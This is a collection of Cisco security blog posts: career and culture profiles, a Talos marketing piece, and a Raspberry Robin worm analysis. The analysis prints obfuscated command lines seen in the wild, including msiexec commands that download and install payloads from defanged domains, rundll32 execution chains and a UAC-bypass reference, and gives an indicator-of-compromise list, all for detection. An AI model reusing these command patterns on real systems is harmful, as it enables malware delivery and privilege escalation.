More formally, the Learning and Development team recently launched a comprehensive talent development program with enablement resources and support for people leaders. Aspects include: “really thoughtful templates for employees to use with their manager to talk through career goals, development areas, and to define an actionable investment plan. These resources are fueling great career conversations, strong alignment, and thoughtful development plans,” Reid said.

9. Are you driven to evolve through variety and internal mobility?

Do you want to refine your skills within your wheelhouse? Or are you driven to try new tasks and potentially change roles within your next organization?

Benge, whose background is in computational astrophysics, has found her interests shift from technical security research to business strategy and data science. At Cisco Talos, she’s been involved in everything from detection research and threat hunting, to community outreach, conference talks and traveling to support sales engagements. Currently, she’s helping to lead threat hunting in Ukraine.

“My leaders have always made it very clear that if there’s an interest, it’s okay to pursue it and it doesn’t have to necessarily be within the scope of my role. Having that freedom to pursue interests within the industry has been really engaging,” Benge said.

10. Recognize your role in shaping culture

In addition to company values and mission statements, leaders and employees contribute to an organization’s culture every day. If you want to enhance your company’s culture, participate.

“Feedback on what employees want to see is crucial,” Reid said. “The easiest way to contribute to developing culture and a positive employee experience in your workplace is to add to what’s already happening! Culture takes participation and ownership from all employees.”

Reid shared that in performance reviews at Cisco, “‘Team Impact” is equally as important as “Results.” Contributing positively to company culture should contribute to performance reviews and promotion justification,” she said.

Join us

To learn more about Cisco’s company culture and how you can contribute to it, check out our open roles.

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Cisco Talos — Our not-so-secret threat intel advantage

By Neville Letzerich — August 24th 2022 at 17:00

Security tools are only as good as the intelligence and expertise that feeds them. We’re very fortunate to have our security technologies powered by Cisco Talos, one of the largest and most trusted threat intelligence groups in the world. Talos is comprised of highly skilled researchers, analysts, and engineers who provide industry-leading visibility, actionable intelligence, and vulnerability research to protect both our customers and the internet at large.

The Talos team serves as a crucial pillar of our innovation — alerting customers and the public to new threats and mitigation tactics, enabling us to quickly incorporate protection into our products, and stepping in to help organizations with incident response, threat hunting, compromise assessments and more. Talos can also be found securing large-scale events such as the Super Bowl, and working with government and law enforcement organizations across the globe to share intelligence.

With Cisco’s vast customer base and broad portfolio — from routers and switches to email and endpoints — Talos has visibility into worldwide telemetry. Once a threat is seen, whether it’s a phishing URL or an IP address hosting malware, detections are created and indicators of compromise are categorized and blocked across our Cisco Secure portfolio.

Talos also leverages its unique insights to help society as a whole better understand and combat the cyberattacks facing us daily. During the war in Ukraine, the group has taken on the additional task of defending over 30 critical infrastructure providers in the country by directly managing and monitoring their endpoint security.

How Talos powers XDR

The reality of security today is that organizations must be constantly ready to detect and contain both known and unknown threats, minimize impact, and keep business going no matter what happens in the cyber realm. In light of hybrid work, evolving network architectures, and increasingly insidious attacks, all organizations must also be prepared to rapidly recover if disaster strikes, and then emerge stronger. We refer to this as security resilience, and Talos plays a critical role in helping our customers achieve it.

For several years, our integrated, cloud-native Cisco SecureX platform has been delivering extended detection and response (XDR) capabilities and more. SecureX allows customers to aggregate, analyze, and act on intelligence from disparate sources for a coordinated response to cyber threats.

Through the SecureX platform, intelligence from Talos is combined with telemetry from our customers’ environments — including many third-party tools — to provide a more complete picture of what’s going on in the network. Additionally, built-in, automated response functionality helps to speed up and streamline mitigation. This way, potential attacks can be identified, prioritized, and remediated before they lead to major impact.

For XDR to be successful, it must not only aggregate data, but also make sense of it. Through combined insights from various resources, SecureX customers obtain the unified visibility and context needed to rapidly prioritize the right threats at the right time. With SecureX, security analysts spend up to 90 percent less time per incident.

Accelerating threat detection and response

One of Australia’s largest universities, Deakin University, needed to improve its outdated security posture and transition from ad hoc processes to a mature program. Its small security team sought an integrated solution to simplify and strengthen threat defense.

With a suite of Cisco security products integrated through SecureX, Deakin University was able to reduce the typical investigation and response time for a major threat down from over a week to just an hour. The university was also able to decrease its response time for malicious emails from an hour to as little as five minutes.

“The most important outcome that we have achieved so far is that security is now a trusted function.”

– Fadi Aljafari, Information Security and Risk Manager, Deakin University

Also in the education space, AzEduNet provides connectivity and online services to 1.5 million students and 150,000 teachers at 4,300 educational institutions in Azerbaijan. “We don’t have enough staff to monitor every entry point into our network and correlate all the information from our security solutions,” says Bahruz Ibrahimov, senior information security engineer at AzEduNet.

The organization therefore implemented Cisco SecureX to accelerate investigations and incident management, maximize operational efficiency with automated workflows, and decrease threat response time. With SecureX, AzEduNet has reduced its security incidents by 80 percent.

“The integration with all our Cisco Secure solutions and with other vendors saves us response and investigation time, as well as saving time for our engineers.”

– Bahruz Ibrahimov, Senior Information Security Engineer, AzEduNet

Boosting cyber resilience with Talos

The sophistication of attackers and sheer number of threats out there today make it extremely challenging for most cybersecurity teams to effectively stay on top of alerts and recognize when something requires their immediate attention. According to a survey by ESG, 81 percent of organizations say their security operations have been affected by the cybersecurity skills shortage.

That’s why Talos employs hundreds of researchers around the globe — and around the clock — to collect and analyze massive amounts of threat data. The group uses the latest in machine learning logic and custom algorithms to distill the data into manageable, actionable intelligence.

“Make no mistake, this is a battle,” said Nick Biasini, head of outreach for Cisco Talos, who oversees a team of global threat hunters. “In order to keep up with the adversaries, you really need a deep technical understanding of how these threats are constructed and how the malware operates to quickly identify how it’s changing and evolving. Offense is easy, defense is hard.”

Maximizing defense against future threats  

Earlier this year, we unveiled our strategic vision for the Cisco Security Cloud to deliver end-to-end security across hybrid, multicloud environments. Talos will continue to play a pivotal role in our technology as we execute on this vision. In addition to driving protection in our products, Talos also offers more customized and hands-on expertise to customers when needed.

Cisco Talos Incident Response provides a full suite of proactive and emergency services to help organizations prepare for, respond to, and recover from a breach — 24 hours a day. Additionally, the recently released Talos Intel on Demand service delivers custom research unique to your organization, as well as direct access to Talos security analysts for increased awareness and confidence.

Enhance your intelligence + security operations

Visit our dedicated Cisco Talos web page to learn more about the group and the resources it offers to help keep global organizations cyber resilient. Then, discover how XDR helps Security Operations Center (SOC) teams hunt for, investigate, and remediate threats.

Watch video: What it means to be a threat hunter

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Raspberry Robin: Highly Evasive Worm Spreads over External Disks

By Onur Mustafa Erdogan — August 9th 2022 at 16:19


During our threat hunting exercises in recent months, we’ve started to observe a distinguishing pattern of msiexec.exe usage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered malware called Raspberry Robin. The RedCanary Research Team first coined the name for this malware in their blog post, and Sekoia published a Flash Report about the activity under the name of QNAP Worm. Both articles offer great analysis of the malware’s behavior. Our findings support and enrich prior research on the topic.

Execution Chain

Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

Image 1: Execution chain of Raspberry Robin

Let’s walkthrough the steps of the kill-chain to see how this malware functions.

Delivery and Exploitation

Raspberry Robin is delivered through infected external disks. Once attached, cmd.exe tries to execute commands from a file within that disk. This file is either a .lnk file or a file with a specific naming pattern. Files with this pattern exhibit a 2 to 5 character name with an usually obscure extension, including .swy, .chk, .ico, .usb, .xml, and .cfg. Also, the attacker uses an excessive amount of whitespace/non printable characters and changing letter case to avoid string matching detection techniques. Example command lines include:

  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /R C:\WINDOWS\system32\cmd.exe<Gne.Swy

File sample for delivery can be found in this URL:

Next, we observe explorer.exe running with an obscure command line argument, spawned by a previous instance of cmd.exe. This obscure argument seems to take the name of an infected external drive or .lnk file that was previously executed. Some of the samples had values including USB, USB DISK, or USB Drive, while some other samples had more specific names. On every instance of explorer.exe we see that the adversary is changing the letter case to avoid detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK


After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -q or /q together with standard installation parameter to operate quietly. Once again, mixed case letters are used to bypass detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you can see above, URLs used for payload download have a specific pattern. Domains use 2 to 4 character names with obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths have a single directory with a random string 11 characters long, followed by hostname and the username of the victim. On network telemetry, we also observed the Windows Installer user agent due to the usage of msiexec.exe. To detect Raspberry Robin through its URL pattern, use this regex:


If we look up the WHOIS information for given domains, we see domain registration dates going as far back as February 2015. We also see an increase on registered domains starting from September 2021, which aligns with initial observations of Raspberry Robin by our peers.

WHOIS Creation Date Count
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Table 1: Distribution of domain creation dates over time


Associated domains have SSL certificates with the subject alternative name of, which points out the underlying QNAP cloud infra. Also, their URL scan results return login pages to QTS service of QNAP:

Image 2: QNAP QTS login page from associated domains

Once the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or control.exe. These binaries are used to execute the payload stored in C:\ProgramData\[3 chars]\

  • C:\WINDOWS\system32\rundll32.exe shell32.dll ShellExec_RunDLL C:\WINDOWS\syswow64\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:\ProgramData\Azu\wnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:\Windows\system32\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:\Windows\syswow64\odbcconf.exe -s -C -a {regsvr C:\ProgramData\Tvb\zhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:\WINDOWS\syswow64\odbcconf -E /c /C -a {regsvr C:\ProgramData\Euo\ikdvnbb.xml.}
  • C:\WINDOWS\system32\rundll32.exe SHELL32,ShellExec_RunDLL C:\WINDOWS\syswow64\CONTROL.EXE C:\ProgramData\Lzm\qkuiht.lkg.

It is followed by the execution of fodhelper.exe, which has the auto elevated bit set to true. It is often leveraged by adversaries in order to bypass User Account Control and execute additional commands with escalated privileges [3]. To monitor suspicious executions of fodhelper.exe, we suggest monitoring its instances without any command line arguments.

Command and Control

Raspberry Robin sets up its C2 channel through the additional execution of system binaries without any command line argument, which is quite unusual. That likely points to process injection given elevated privileges in previous steps of execution. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.

Detection through Global Threat Alerts

In Cisco Global Threat Alerts available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track this activity under the Raspberry Robin threat object. Image 3 shows a detection sample of Raspberry Robin:

Image 3: Raspberry Robin detection sample in Cisco Global Threat Alerts


Raspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and abuse of compromised QNAP accounts. Although we have similar intelligence gaps (how it infects external disks, what are its actions on objective) like our peers, we are continuously observing its activities.

Indicators of Compromise

Type Stage IOC
Domain Payload Delivery k6j[.]pw
Domain Payload Delivery kjaj[.]top
Domain Payload Delivery v0[.]cx
Domain Payload Delivery zk4[.]me
Domain Payload Delivery zk5[.]co
Domain Payload Delivery 0dz[.]me
Domain Payload Delivery 0e[.]si
Domain Payload Delivery 5qw[.]pw
Domain Payload Delivery 6w[.]re
Domain Payload Delivery 6xj[.]xyz
Domain Payload Delivery aij[.]hk
Domain Payload Delivery b9[.]pm
Domain Payload Delivery glnj[.]nl
Domain Payload Delivery j4r[.]xyz
Domain Payload Delivery j68[.]info
Domain Payload Delivery j8[.]si
Domain Payload Delivery jjl[.]one
Domain Payload Delivery jzm[.]pw
Domain Payload Delivery k6c[.]org
Domain Payload Delivery kj1[.]xyz
Domain Payload Delivery kr4[.]xyz
Domain Payload Delivery l9b[.]org
Domain Payload Delivery lwip[.]re
Domain Payload Delivery mzjc[.]is
Domain Payload Delivery nt3[.]xyz
Domain Payload Delivery qmpo[.]art
Domain Payload Delivery tiua[.]uk
Domain Payload Delivery vn6[.]co
Domain Payload Delivery z7s[.]org
Domain Payload Delivery k5x[.]xyz
Domain Payload Delivery 6Y[.]rE
Domain Payload Delivery doem[.]Re
Domain Payload Delivery bpyo[.]IN
Domain Payload Delivery l5k[.]xYZ
Domain Payload Delivery uQW[.]fUTbOL
Domain Payload Delivery t7[.]Nz
Domain Payload Delivery 0t[.]yT


  1. Raspberry Robin gets the worm early –
  2. QNAP worm: who benefits from crime? –
  3. UAC Bypass – Fodhelper –
☐ ☆ ✇ Security – Cisco Blog

Advocating for Passion, Kindness and Women in STEM

By Mary Kate Schmermund — July 27th 2022 at 12:00

Over her 25-year-plus career, Saleema Syed has seen the information security industry from a variety of vantage points, all while championing women in technology. Syed worked as director of business systems and data management for Duo Security before rising to vice president of information technology. Later, after Duo was acquired by Cisco, she transitioned to new roles within the larger organization and now heads up operations for Webex Marketing. In this position Syed brings structure across different functions of marketing including brand, events and technology while also serving as chief operating officer for Chief Marketing Officer Aruna Ravichandran.

“I fell in love with the culture, the kindness, the heart of this company,” Syed said.

Recently, she shared her passion for problem solving and inclusion with the Duo Blog, along with the advice she gives mentees navigating their own career paths.

Not Staying Comfortable, But Always Staying Kind

What about your work energizes you?

Saleema Syed: I like chaos and I love putting a method to the madness. With marketing we have to react to the market, react to the business, react internally. What energizes me is there’s never a dull day and there is always this ability to bring some overall end to end process.

I love running towards a burning car and figuring out how to put it out. I love change. I know change is the only constant and rather than running away from it, I thrive in it. I like to look at it and ask, “What can we do to break it down and figure out what we need to do?”

My brain works in terms of boxes and flows and charts and spreadsheets so when I look at something I’m like, “Okay, what is a box? What is a process? How do I untangle it?” I like sitting in the discomfort and understanding what to do to get out of it.

What drives your career decisions in terms of transitioning from different roles and parts of an organization?

Saleema Syed: There are three things I always keep in mind when I look at what I’m doing and where I want to be. One is, at the core of it, does it fill my cup of empathy and allow me to be true to who I am in how I treat people or how I build a team?

The second thing is, will I have the opportunity to influence and impact the people on the team or my family? How do I show myself to my daughter who is growing and seeing how to become who she is as a career person?

The third thing is, is it something new and am I learning something? Continuous learning is a huge part of who I am, so that drives me to get out of my comfort zone constantly.

When I’m changing jobs people usually say, “You’ve set up this team, you’re so comfortable. Now all you have to do is sit back and execute.” And my answer is, “That’s exactly why I am moving.”

If I am comfortable I’m not learning, and I don’t know if I’m adding any more value than I’ve set up. That means it’s time for me to move on and elevate somebody. What I’m doing is sending the elevator down to somebody on the team to grow.

That’s why I’ve had people who work for me for many years follow me through multiple organizations, which as a leader has been my pinnacle of what I call my success. Success is not my role; it is how many people I have impacted and influenced.

How do you determine the types of problems you want to solve and challenges you want to approach professionally?

Saleema Syed: I keep going back to Duo because working at that organization and meeting those people defined me as a human being. One of the strategic pillars of that organization is to be kinder than necessary.

However complicated the work challenges are, those around me must be aligned with what my integral values are and who I am. They have to have empathy and kindness in their heart. If that is not there, no matter how much I love solving challenges and know I can solve them, I’m not going to go for it. I’ve been extremely lucky at Duo, Cisco and Webex that I’ve been around those kinds of people.

If you look at Webex, I love the core of what we are, the journey we are on, the inclusivity. We are not just selling Webex messaging or other products. At the heart of it we are looking at how we are influencing people and things around us by making sure that there is inclusivity in the collaboration tools that we are launching.

Leading Through Inclusivity + Advocating for Women in Technology

What is your leadership style?

Saleema Syed: My leadership style is pretty simple: nobody works for me; people work with me. I lead with making sure that people know this is the problem you’re trying to solve, here is the context of what we are trying to do. Now, let’s figure out how we solve it. That is something that has helped my team be part of the problem solving that I love to do.

When I interview people my first questions are, “What does the job bring to you? How would this job fill your cup?” That throws people off every time. You can teach any technology, you can teach any skill set, but if you don’t have the basic passion, the attitude to be able to do this job, then everything else can just go out the door.

As a leader who is a woman of color, what particular challenges, triumphs or learning have you experienced?

Saleema Syed: I have a very diverse background. I am an Indian by birth and grew up in the Middle East. When I went into engineering, finished my education and started my career, one of the things I realized was that as a woman of color, I always wanted to apply for positions that I was fully qualified for. I wanted to make sure I knew everything about the job because a very big fear was being asked a question in the interview I didn’t know. LinkedIn’s Gender Insights Report found that women apply for 20% fewer jobs than men despite similar job search behaviors. That has been a very challenging mental barrier for me to break.

Trey Boynton, who was at Duo and now she’s leading Cisco in a beautiful journey of diversity as the senior director of inclusion and collaboration strategy always said, “We have to have that bicycle lane on the road, whether it is for females, whether it is for people of color or any LGBTQIA+ community members. That is how we get people to bring that confidence in to learn, grow and then they can merge easily.”

“Passion is a part of who I am and is contributing to my growth.” – Saleema Syed

Whatever I faced as I was growing up, whether it was my dark skin, whether it was my accent, whether it was, “Oh, you’re way too passionate” has been some of the feedback that I’ve gotten. In my career if I’m told I’m way too passionate I turn that around and say, “Passion is a part of who I am and is contributing to my growth.”

How else do you advocate?

Saleema Syed: Within Webex, within Cisco, I try to be part of anything that I can do in terms of giving back to the community. I’m definitely a big proponent of women in technology. In the local Dallas area I run a program by myself and go into schools and advocate for girls in STEM. Cisco is amazing in how it gives us time to volunteer. I love that educating kids is part of my journey of giving back. That’s the generation you can influence.

How do we enable children and women to be more open to technology and being part of the technology field? Let’s look at the percentage of diversity in the technology field and be aware of it. It’s not only about the diversity numbers, but are we bringing in candidates at the leadership level and giving them not just a seat at the table but a voice at the table, too?

You also have to talk about what you do and with passion and energy because if you don’t, people get intimidated. If you can influence one person who comes from an underrepresented community, imagine what you are doing, not just for that person, but for his household, for his family, for his extended community. I have a lot more to do, but as I get into the next decade of my life and my career, that is something that is a huge focus for me.

What advice do you have for people navigating their careers and wanting to enter tech and cybersecurity?

Saleema Syed: First and foremost it’s very important to spend time and understand the business and the products in whatever industry you’re going into. It is key to your growth. Especially if it’s a security industry, take time to understand the products, the technology or the function that you’re trying to get into. Contextual understanding and product understanding are extremely important.

The second piece is to keep learning. Cisco is amazing in trying to help you learn and support you financially to be able to do it. I went back and got my executive MBA four years ago. Give yourself a goal of learning a new something, whether it is a new function, new technology or new leadership skill.

The third piece is to create a spreadsheet of where you want to be in two years. Put that out there and then work back just like you would do a project plan. Work back month by month, quarter by quarter. What are the skill sets you need to learn to get there?

The last part is: Do the job you want versus the job you are in. Of course, you have to do the job you are in, but do the job you want to get to. Don’t wait for a title, don’t wait for a promotion to act. No. What do you want to be? Show that to your leaders and yourself. The title will come, money will come, everything will come, but am I doing the job that I want and enjoy and I want to get to?

Join Us

To learn more about Webex, Cisco and Duo Security and how you can apply your passion, advocacy and problem solving to make a difference in cybersecurity, browse our open roles.

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Cisco Salutes the League of Cybersecurity Heroes

By Cristina Errico — July 25th 2022 at 12:00

We have entered a world where uncertainty has become the normal operating mode for everyone. Within this new frontier, cybersecurity has become even more challenging. However, some cybersecurity professionals have stood out, using their unique skills and resourcefulness to protect the integrity of their businesses, and to withstand unpredictable and dynamically changing threats. In the end, they, and their businesses have emerged even stronger.

These accomplishments have lead them to be selected from over more than 700 Cisco Cybersecurity Advocates – who are also members of Cisco Insider Advocates – to join the League of Cybersecurity Heroes.

Cisco Insider Advocates is a peer networking community developed several years ago for Cisco customers around the globe. Currently, over 14,000 customers are using it to share technology insights, feedback, and best practices, and also to make meaningful connections with others in the industry. We at Cisco believe that when we connect, anything is possible, and the Insider Advocacy program is a great example of the great things that can happen when people come together.

Let’s meet our League of Cybersecurity Heroes

Roberto Alunda

As the global CISO of Mediapro, Roberto has deployed Cisco SecureX together with Umbrella, Secure Endpoint, Secure Firewall, ISE, NGIP, Threat Response, AnyConnect, and Web security. With this partnership, Mediapro has reduced its threat detection time by 90%. In addition, they have seen no false positives in their threat detection alerts. It is rare to boast of a 100% success rate, but they can boldly make that pronouncement. All of this has also benefitted Mediapro financially by incurring zero fines for any compliance issues

Blair Anderson

What do music, cybersecurity, and teaching all have in common? They all culminate in a readiness to perform. Equally, they all require collaboration, comfort with the unexpected, and a passion for the job. Blair exemplifies the best of these traits, and in doing so, he provides inspiration and excellence to all with whom he interacts. Watching Blair at work makes one wonder if there are more hours granted to him during a day than the average person. He is a time-maximizer, spending most of that time in the service of others.

Kevin Brown

Too often, cybersecurity certifications are treated derisively by some of the very professionals who need them most. This is not the case with Kevin, who can list the many benefits of attaining certifications. Kevin’s desire to improve his knowledge doesn’t stop with technology and cybersecurity. He is an avid reader of anything that can raise him up to be better than he was the day before. With a career that started in the US Marine Corps, Kevin continues to learn and grow, all the while remaining as masterful at a computer keyboard as he is his with his traditional 55-gallon-barrel BBQ smoker and grill.

Steve Cruse

Steve is a Senior Cybersecurity and Network Architect at Lake Trust Credit Union. Like most organizations, Lake Trust has had to transition to a completely remote workforce quickly, and thanks to Secure Network Analytics, they were able to transition the employees to work remotely while maintaining the same high level of visibility and protection in place. Steve was the subject of a case study about the benefits that Cisco products have brought to Lake Trust Credit Unions’ customers. He is currently collaborating to update that information to share more of his knowledge.

Enric Cuixeres

Being the Head of Information Technology is never an easy job. However, when food manufacturer, Leng-d’Or, was faced with a challenge during the pandemic that could have interrupted its production line, quick thinking, skilled leadership, and a close partnership with Cisco all lead to positive outcomes, and helped them to pull through stronger than before. Part of this success comes from Enric’s distinct understanding of the threats, solutions, and processes needed to bring security to a higher level for the Leng-d’Or organization. Enric also shares his success story very freely, adding immeasurable benefits to the security community.

Tony Dous

Cybersecurity is truly a global discipline. Tony Dous proves this by practicing his craft as a Senior Network Security Engineer in Cairo, Egypt. Tony’s involvement with the Cisco community shows how no distance is too far for a motivated cybersecurity professional.

John Patrick Duro

When John Patrick is on the job, there is no longer any feeling that the criminals are one-step ahead of the good guys. He adopted Umbrella together with Meraki to develop a proactive security approach inside his organization. John Patrick created a more unified network from a patchwork of disparate entities. In doing so, he reduced the complexity within the environment. Complexity is so often responsible for security gaps, and John Patrick’s work not only corrected those gaps, but he brought people together in the process. He and his team received great feedback from the employees, who enjoyed a consistent network experience.

Amit Gumber

We often hear stories about teenagers who become enamored with technology, leading to the fulfillment of a dream. Amit Gumber became interested in cybersecurity at an early age, pursued his passion and has worked in the field ever since. His sense of advocacy is best described in his own words: “I’m quite passionate about sharing knowledge and ideas with peers and participating in collaborative activities.” Amit’s use of Cisco technologies has helped HCL Technologies to stabilize and secure their environment.

Mark Healey

One of the most important factors for success is insatiable curiosity. Mark Healey is a continuous learner, and he is an example of someone who enthusiastically shares his knowledge. Whether it is on a personal level, or through his high engagement as part of the Cisco Insider Advocates community, or as an active member of the Internet Society, Mark is an evangelist and a positive voice for cybersecurity.

Wouter Hindriks

Wouter holds a special designation, not only as a member of the League of Cybersecurity Heroes, but also as the recipient of the “Cybersecurity Defender of the Year” award. Wouter is an active participant in the cybersecurity community, working with an almost evangelical zeal towards sharing the importance of holistic cybersecurity. His contributions stand out towards making the cyber realm a safer place.

Bahruz Ibrahimov

It is often said that the job of a cybersecurity professional in an educational facility is especially challenging. When that facility happens to be the largest in an entire country, with over 4,000 schools and universities, the job of protecting it can seem insurmountable. At AzEduNet, in Azerbaijan, Bahruz and his team is tasked with securing the network for its 1.5 Million students. With Cisco Secure, the security team reduced security incidents by 80%. This not only ensures access for the students, but also keeps the data safe.

Walther Noel Meraz Olivarria

Many people want to enter the cybersecurity profession, but few have the dedication and perseverance to fully embrace the skillset required to meet that goal. Walther Noel not only had the desire to refocus his career, but he proved it by earning the CyberOps Associate Certification. His accomplishment is a prime example of how one can step outside of their comfort zone to grow and thrive.

Pascual Sevilla

Pascual demonstrates how important it is to make the most of the learning opportunities in Cisco Insiders Advocates. While already a successful NOC engineer, he sought to advance his professional development by studying cybersecurity. He passed the CCNA CyberOps 200-201 exam, moving him closer to propelling his career to even higher achievements.

Inderdeep Singh

One of the noblest expressions of knowledge is the desire to freely share that information. Inderdeep lives up to this ideal, offering his expertise to all with no expectations of reciprocity. His charitable spirit has not gone unnoticed, as he has been a previous award winner for Cisco IT Blogs, as well as a designation on the Feedspot top 100 Networking Blog.

Luigi Vassallo

Being the first to try a new technology can be a risky proposition. However, as a COO, risk calculations are in one’s blood. Luigi, along with the Sara Assicurazioni organization, hails as the first company in Italy to embrace cloud technology. As a company with more than one million customers, this was a bold initiative that required careful planning, keen insight, and above all, collaboration. In the end, this has resulted not only in a digital transformation, but a business transformation.

Whether it is a technical achievement, a personal triumph, or a spirit of helping others, each member of our League of Cybersecurity Heroes proves how technology and humanity can work together to accomplish the impossible. Congratulations to all of them!

Want to learn more about how Cisco can help you succeed?

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☐ ☆ ✇ Security – Cisco Blog

A Unique Cybersecurity Career Path: From Journalism to Cisco

By Mary Kate Schmermund — July 22nd 2022 at 12:00

Few security career paths are linear. For Stephanie Frankel the journey to Cisco Secure was circuitous. The Ann Arbor, Michigan native studied journalism at the University of Michigan before managing communications for the Washington Capitals and NBC Sports. But after several stints at communications agencies, she charted a new path for herself in cybersecurity. Not only has her diverse background served as a strength in her current role as senior manager for strategy and operations, but it’s also informed her management philosophy.

Road to Cybersecurity

After doing project management and account direction at consulting agencies, Frankel was interested in honing her skills and expertise on the client side. She had heard amazing things about Duo and wanted to stay in Ann Arbor and work for a company with local roots. After interviewing, Frankel realized that “working at Duo was a cool, exciting opportunity with a really awesome group of people.”

Frankel was on the ground running working as a technical project manager in research and development overseeing the Multi-Factor Authentication, applications and mobile engineering teams despite not having worked in information security before.

Duo’s security education allowed Frankel to understand the industry and is something she values for getting more people into the cybersecurity field. At Duo and Cisco Secure, employees come from a variety of backgrounds and some don’t have much (or any) experience with cybersecurity.

Robust educational programs build knowledge about security and specific products which empower new team members to grow and learn. Every team also has a learning and development budget for employees to quench their curiosity and enhance their knowledge through courses, books or other programs Manager of Global Employee Programs Anndrea Boris shared.

“People are open to having conversations and open to ideas and ways to solve those ideas. If you have an idea of how to solve a problem, no matter whether it’s your job or not, people are open and willing to listen to you.” – Stephanie Frankel

Something Frankel also appreciates most is that ideas are valued at Duo and Cisco Secure: “Even in my first job, I would have ideas and go to my boss or our head of engineering and say, ‘Hey, I think this could be a really cool opportunity, and I think it needs this.’ People are open to having conversations and open to ideas and ways to solve those ideas. If you have an idea of how to solve a problem, no matter whether it’s your job or not, people are willing to listen to you.”

After a year, Frankel moved from engineering to marketing to run operations for Duo’s in-house brand team, leading the team through a rebrand. “The team really rallied behind this new brand and it was amazing to see their pride and hard work when sharing it,” she said. With Frankel’s leadership, the team showcased not only the new look and feel of the brand but also the customer research that went into understanding the need for the change.

“Our amazing team knew that for it to catch on internally we needed to help people understand the why. The team put together an amazing training and went around the company to help people understand the security buyer, the industry overall and our differentiators and how we could do all of this within the umbrella of Cisco,” she said.

Recognizing that she most enjoys and feels best suited for a strategic operations role, she had open conversations with her manager. “I told my boss, ‘It’s just not a great fit.’” Her manager was very supportive, and they worked through potential options. “You’ll find a lot of that at Cisco,” she said.

Now as senior manager in the Strategy and Operations Group within Cisco’s Security and Collaboration division, Frankel runs key initiatives for business operations that drive business growth. She is empowered to creatively solve problems and collaborate “with all the stakeholders within each group to move these programs forward, to understand the problems we’re looking to solve, create objectives, a program plan, and continue to track metrics and progress towards those ultimate goals,” she said.

Growing as a Leader at Cisco

A self-described “over communicator,” Frankel believes that as a leader, “the more you communicate and the more transparent you are, the better.” Frankel loves leading people who are experts in their fields and letting them do what they do best.

On the brand team, for example, she trusted her team’s expertise in producing stories, videos and animations to demystify Cisco’s security products.

“All I needed to do was give them the objective and the goals and they were able to come up with the solutions,” Frankel said.

She fondly remembers the boss at one of her first jobs out of college. In that job Frankel wrote press releases and wanted her boss to fully approve the final versions before sending them to the media. Once her boss told her, “Stephanie, if you keep giving it back to me, I will keep finding things to change. I trust you to know when it is ready to go.” That confidence in her so early in her career “gave me so much confidence in myself,” she said.

Frankel emulates his approach to management by recognizing that each employee has different needs in their lives, in their careers, and in how they like to receive feedback. From that boss Frankel first learned that for every piece of negative feedback, you must give four pieces of positive feedback for “someone to actually hear it because that’s how you balance things out in your mind.”

Frankel believes feedback is crucial for growth. “I don’t see how you can improve or grow without it, no matter what level of your career you’re at. Feedback shouldn’t be taken as negative, as much as it is a way for you to improve,” she said.

One of the most helpful things Frankel learned in a Cisco class for managers was the importance of asking a person if they are in a good place to receive critical feedback. “You might not be in the mindset to accept the feedback and to do something constructive with it,” she said. ”If you’re having a bad day or struggling, you could say, ‘You know what, I’m not going to be able to take it today, but let’s talk tomorrow and I’ll be in a better place to receive it.’’’

The Power of Pivot on a Security Career Path

Frankel has spent the last year thriving in a role she never anticipated in an industry her college training in journalism didn’t fully prepare her for. The secret, she says, is keeping an open mind to new possibilities and a willingness to take on new challenges, even if you don’t feel 100% ready.

“A lot of it is getting real world experience and learning your way through it and knowing that there’s a lot of opportunities and a lot of people that are willing to teach you,” she said.


To pivot professionally Frankel advises not feeling pigeonholed just because you studied a particular topic or have been in a certain industry for a long time. Take what you can from where you started such as storytelling and communications skills in the case of journalism for Frankel. While trying something new may require taking a different level or type of job “sometimes it’s worth it because you have that opportunity to grow and you might find you’re happier somewhere else,” she said.

When discerning professional steps Frankel recommends having open and honest conversations with yourself and others such as mentors.

“Cisco has so many mentorship programs and so many people that are knowledgeable about a lot of things,” she said. ”Just because your current role isn’t a great fit doesn’t mean that there’s not another good fit within the corporation, or it doesn’t mean that you can’t create your own good fit.”

Get started on your career path

